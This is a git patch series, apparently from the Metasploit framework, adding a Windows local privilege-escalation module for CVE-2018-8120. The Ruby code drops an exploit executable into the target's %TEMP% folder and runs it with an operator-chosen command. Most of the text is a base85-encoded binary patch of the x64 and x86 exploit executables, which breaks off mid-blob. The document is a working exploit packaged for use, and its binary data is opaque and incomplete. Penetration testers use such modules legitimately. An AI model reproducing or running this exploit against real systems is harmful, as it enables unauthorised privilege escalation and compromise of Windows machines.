def write_exe_to_target(rexe, rexename) - begin - print_status("Writing file to temp") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - write_file_to_target(temprexe,rexe) - end - print_good("File path on remote system: #{temprexe}") - temprexe - end - - def write_file_to_target(temprexe,rexe) - fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) - fd.close - end - - def create_payload_from_file(exec) - print_status("Reading file from: #{exec}") - ::IO.read(exec) - end - - def run - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - print_good("EXE name is: #{rexename}") - poccmd = datastore['POCCMD'] - - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) - - print_good('Initiating module...') - print_line - - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - print_good("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "\"#{poccmd}\"" - print_good("Executing command: #{command}") - command_output = cmd_exec(command) - print_line(command_output) - print_line - end -end From 521b50af559bc14af02149c539f47d93215d6f96 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Thu, 11 Oct 2018 10:43:35 -0500 Subject: [PATCH 30/39] added separate binaries, extended for x86 --- .../CVE-2018-8120/CVE-2018-8120x64.exe | Bin 0 -> 95744 bytes .../CVE-2018-8120/CVE-2018-8120x86.exe | Bin 0 -> 83456 bytes .../windows/local/ms18_8120_win32k_privesc.rb | 36 +++++++++++------- 3 files changed, 22 insertions(+), 14 deletions(-) create mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe create mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe new file mode 100755 index 0000000000000000000000000000000000000000..c18118b2ba3afee8de66940a624692c66554bdf0 GIT binary patch literal 95744 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 